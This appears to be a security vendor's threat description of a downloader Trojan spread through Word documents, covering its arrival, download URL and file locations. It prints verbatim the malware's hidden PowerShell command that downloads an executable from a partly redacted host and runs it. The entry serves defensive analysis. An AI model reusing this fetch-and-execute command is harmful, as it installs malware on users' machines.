JS_NEMUCOD.ELDSAUFY

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

This malware arrives via the following means:

• Embedded in Microsoft Word Documents

Download Routine

This Trojan accesses the following websites to download files:

• http://{BLOCKED}ibitkiselshop.com/lib/images/urunler/winsys.exe

It saves the files it downloads using the following names:

• %User Temp%\anyFileName.exe

(Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, Windows Server 2003, and Windows XP (32- and 64-bit); C:\Users\{user name}\AppData\Local\Temp on Windows Vista (32- and 64-bit), Windows 7 (32- and 64-bit), Windows 8 (32- and 64-bit), Windows 8.1 (32- and 64-bit), Windows Server 2008, and Windows Server 2012.)

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Other Details

This Trojan does the following:

• The malware uses the following command to execute its malicious routine:
  cmd.exe /c powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass $path = $env:temp + '\' + 'anyFileName.exe';(New-Object System.Net.WebClient).DownloadFile('http://{BLOCKED}ibitkiselshop.com/lib/images/urunler/winsys.exe', $path);Start-Process $path

NOTES:

This malware arrives through a Word document file. It is embedded and will execute its routine upon activation by the user: